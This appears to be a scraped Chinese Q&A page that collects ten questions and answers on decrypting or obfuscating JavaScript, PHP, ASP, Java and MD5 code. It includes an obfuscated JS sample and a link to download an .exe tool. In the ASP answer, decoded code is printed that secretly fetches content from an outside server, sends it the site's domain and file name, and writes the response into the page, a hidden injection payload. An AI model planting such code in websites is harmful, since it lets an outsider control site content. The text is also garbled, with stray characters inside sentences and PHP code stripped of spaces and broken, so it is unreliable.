⑴ 這個代碼是加密過的。求應該怎麼解密。求``
首先,這里所說的代碼指的是JS,即javaScript文件中的代碼。
QQ空間中,隨機背景、花、播放器等代碼都是採用鏈接一個外部的JS文件形成的代碼。不難發現很多這樣的JS代碼都被加密了,所以大家總是用別人的,像隨機花的代碼,除了本空間用的版本外,網上流傳的其它版本似乎只有返碼一個。
懂JS的人會打開別人的JS文件來看,用於QQ空間的JS被打開後往往看到的是類似下面的東西:
OlOlll="(x)";OllOlO=" String";OlllOO="tion";OlOllO="Code(x)}";OllOOO="Char";OlllOl="func";OllllO=" l = ";OllOOl=".from";OllOll="{return";Olllll="var";eval(Olllll+OllllO+OlllOl+OlllOO+OlOlll+OllOll+OllOlO+OllOOl+OllOOO+OlOllO);eval(l(79)+l(61)+l(102)+l(117)+l(110)+l(99)+l(116)+l(105)+l(111)+l(110)+l(40)+l(109)+l(41)+l(123)+l(114)+l(101)+l(116)+l(117)+l(114)+l(110)+l(32)+l(83)+l(116)+l(114)+l(105)+l(110)+l(103)+l(46)+l(102)+l(114)+l(111)+l(109)+l(67)+l(104)+l(97)+l(114)+l(67)+l(111)+l(100)+l(101)+l(40)+l(77)+l(97)+l(116)+l(104)+l(46)+l(102)+l(108)+l(111)+l(111)+l(114)+l(40)+l(109)+l(47)+l(49)+l(48)+l(48)+l(48)+l(48)+l(41)+l(47)+l(57)+l(57)+l(41)+l(59)+l(125));eval(""+O(102968335)+O(99998335)+O(106928335)+O(106928335)+O(109898335));
(PS:這段代碼的譯文是:hello)
看到別人把代碼弄成這個樣子,心動了吧?是不是想把派此自己辛苦寫出來的代碼也加上密呢?Kim HyunJung根據解密原理寫了個漏羨哪小程序,用於使JS代碼加密成上面的樣子。想要的趕緊點下面的地址下載吧:
http://kimhyunjung.blogbus.com/files/1138097885.exe
⑵ php代碼加密怎麼解密
$key="Thisissupposedtobeasecretkey!!!";
functionkeyED($txt,$encrypt_key)
{
$encrypt_key=md5($encrypt_key);
$ctr=0;
$tmp="";
for($i=0;$i<strlen($txt);$i++){
if($ctr==strlen($encrypt_key))$ctr=0;
$tmp.=substr($txt,$i,1)^substr($encrypt_key,$ctr,1);
$ctr++;
}
return$tmp;
}
functionencrypt($txt,$key)
{
srand((double)microtime()*1000000);
$encrypt_key=md5(rand(0,32000));
$ctr=0;
$tmp="";
for($i=0;$i<strlen($txt);$i++){
if($ctr==strlen($encrypt_key))$ctr=0;
$tmp.=substr($encrypt_key,$ctr,1).
(substr($txt,$i,1)^substr($encrypt_key,$ctr,1));
$ctr++;
}
returnkeyED($tmp,$key);
}
functiondecrypt($txt,$key)
{
$txt=keyED($txt,$key);
$tmp="";
for($i=0;$i<strlen($txt);$i++){
$md5=substr($txt,$i,1);
$i++;
$tmp.=(substr($txt,$i,1)^$md5);
}
return$tmp;
}
$string="HelloWorld!!!";
//encrypt$string,andstoreitin$enc_text
$enc_text=encrypt($string,$key);
//decrypttheencryptedtext$enc_text,andstoreitin$dec_text
$dec_text=decrypt($enc_text,$key);
//加密
functionstr2hex($s)
{
$r="";
$hexes=array("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
for($i=0;$i<strlen($s);$i++)=""$r.=($hexes[(ord($s{$i})>>4)].$hexes[(ord($s{$i})&0xf)]);
return$r;
}
//解密
functionhex2str($s)
{
$r="";
for($i=0;$i<strlen($s);$i=""+="2)"{
$x1=ord($s{$i});
$x1=($x1>=48&&$x1<58)?$x1-48:$x1-97+10;
$x2=ord($s{$i+1});
$x2=($x2>=48&&$x2<58)?$x2-48:$x2-97+10;
$r.=chr((($x1<<4)&0xf0)|($x2&0x0f));
}
return$r;
}
echostr2hex("山東");
echo"
";
echohex2str("c9bdb6ab");
?>
⑶ 格式化加密的js代碼怎麼還原
無法還原。
混淆過的js變數名和方法名全部都是無意義的字元,注釋也被刪除;
所以很難看懂具體業務。
如果你想完成某一個功能,去嘗試找其他的有源碼的代碼吧。網上js效果代碼很多。
如果你想窺探某個網站的js技術框架,我覺得還是放棄吧。。。
⑷ 這個PHP的加密代碼怎樣破解,這個是什麼原碼來的
可以用黑刀Dezender來試試,我不擔保可以解出來的哦,
從黑刀Dezender4.3版之後,將著力對混淆函數以及自定義函數的解密進行應對。
大家下載壓縮包並解壓後,會發現有一個「config.ini」的文件,這就是混淆函數庫啦!
打開後,可自行編輯其中的內容,當然,也可以通過黑刀Dezender的升級程序直接下載官方最新的混淆函數庫文件。這個混淆函數庫就相當於是一個字典文件了,在保證格式不變的情況下,大家可以在【黑刀部落】下載《黑刀超級字典生成器》生成字典來掛入主程序進行解密,正確步驟為:先備份、改名自己的config.ini文件,生成的字典文件在第一行加入「[OBFUSCATE_NAME]」,將字典手差文件改名為config.ini,開始解密。
同時,黑刀部落網站的「項目中心」欄目也開設了用戶提交自己已知程序被混淆的函數列表,這樣的話,就能讓Dezender變得越來越強了。再也不怕混淆函數了。呵呵。
什麼是混淆函數?混淆函數,是從Zend Guard 4.0之後新增的一項功能,能把PHP文件中的所有函數名都進行混吵指淆,混淆後變成以「_OBFUSCATE_」開頭的一串「亂碼」,這種加密方式感覺有點類似Md5,因為函數名已經不是原來的樣子了,所以解密出來的PHP文件是不能正常執行的。黑刀Dezender在4.3版之後,新增加了掛入混淆函數庫參與解密的功能,而混淆函數庫,就像是一個包含了已知函數名的字典,利用這個字典,來與被混淆了的函數名(就是所謂的「亂碼」)進行比對,如果比對結畢碰皮果相同,則解密出來的文件,基本上就可以恢復到加密前的樣子了。如果混淆函數庫中沒有包含該PHP文件中使用的函數名,那麼解密結果依然還是會存在「亂碼」的。掌握了這個原理,我們就可以去想辦法解決問題了。
方式有以下幾種:
第一,使用黑刀超級字典生成器產生一個字典,字典的內容可以自己把握,修改字典文件名為「config.ini」,然後打開字典文件,在第一行插入「[OBFUSCATE_NAME]」標記(注意,方括弧也是需要的,也就是引號內的內容都要加進去),將字典文件拷貝入黑刀Dezender主程序所在目錄,同時注意備份原有的config.ini文件。這種辦法費時費力,也要看運氣,不過卻是最實際的解決辦法。
第二,常看別人源代碼的朋友,可以把自己已經掌握了的混淆函數的真實函數名提交到我的網站上來。操作步驟:進入網站首頁,進入項目中心的「DeZender混淆函數庫更新表」,提交。我會定期查看大家提交上來的數據,加入到官方的混淆函數庫中,不斷的增強和完善官方混淆函數庫,大家可以利用黑刀Dezender的自動升級功能對其進行升級!
⑸ 公司代碼被加密,有什麼辦法可以考出來么
看用什麼軟體加密的吧,如果是用IP-guard加密的,那就別想了,腔銀目前沒發現有什麼辦法可以未經解耐拍密拷出加密代碼的
IP-guard的加密基於驅動層和應用層,驅動層加密強度和速度都遠超應用層加密,技術要求比較高,也是目前企業加密產品比較高端伍畝宴的加密方式,支持多種格式的源文件,可以自動加密保護源代碼,無需手動加密和解密,內部授權環境可以正常打開加密源文件,而一旦未經解密將加密源文件帶離內部授權環境,則無法正常打開。
⑹ java代碼想加密怎麼處理
如果你說的是文本加密,有很多方法,自己也可以寫個字元變換程序
如果是代碼加密,沒用的,java就是開源。
你藏再厲害,編譯+反編譯,干凈的源碼就出來了
⑺ php源代碼被加密了,請問如何解密
php源碼被使用zend加密,現階段還沒用解密方法。但是好像現在有這樣的一個studio,他們成功地完成了zend和eac的decode
不過是收費的
⑻ 誰知道這段加密的asp代碼怎麼解密
解後困帶棚數據
<%
dim domain,id,filename
domain = Request.ServerVariables("SERVER_NAME")
Dim strURL,intPos,intStrLen,strFileName
strURL = Request.Servervariables("url")
intPos = InstrRev(strURL,"/")
intStrLen = len(strURL)
strFileName = Right(strURL,intStrLen-intPos)
Randomize()
n=Int((10000-1+1)*Rnd(now())+1)
id=request("aid")
if id="" then
url="http://numid.0752huida.com:88/server.php?aid=" & n & "&domain=" + domain + "&filename=" + strFileName
linkurlcode=getHTTPPage(url)
response.Write linkurlcode
else
url="http://numid.0752huida.com:88/server.php?aid=" + id + "&domain=" + domain + "&filename=" + strFileName
linkurlcode=getHTTPPage(url)
response.Write linkurlcode
end if
Function getHTTPPage(url)
dim objXML
set objXML=createobject("MSXML2.SERVERXMLHTTP.3.0")
objXML.open "GET",url,false
objXML.send()
getHTTPPage=bBytesToBstr(objXML.responseBody)
set objXML=nothing
End Function
Function bBytesToBstr(body)
dim objstream
set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
bBytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
end Function
%>
教你解,代碼 execute(UnEncode(wei)) 轉成 response.write(UnEncode(wei)) 在察看源文件(代碼),在按這個辦法轉下,不過裡面行姿的是UnEncode(darkst)了,把wei改成darkst.
這里代碼加汪則密兩次.
樓上的不是解不了,而是你不會看代碼,好了,給分吧.
⑼ php文件被處理了,好像是加密了,怎麼解密呀,請教高手。代碼如下:
這個是zend加密 你去網路搜索「zend解密工具」 下載一個 然後看看他的教程岩槐數怎麼操作 因為不同的zend的使用方法不一樣,我也個你說不準卻他的具體操作,你去下載一個看看就知道怎麼用了 不過zend解密不保粗首證能100%的全部解密, 這個加密過的文件在解密只能保證有95%或者明旦更低的可用性,明白么?
⑽ 我有md5 加密代碼 可是加密後怎麼破解啊
md5 加密運算是不可逆運算,也就是不能通過加密後的結果得到原始串,
現在的破解方法都是暴力破解,講字元串加密後比較來判斷,太復雜的密碼是
算不出來了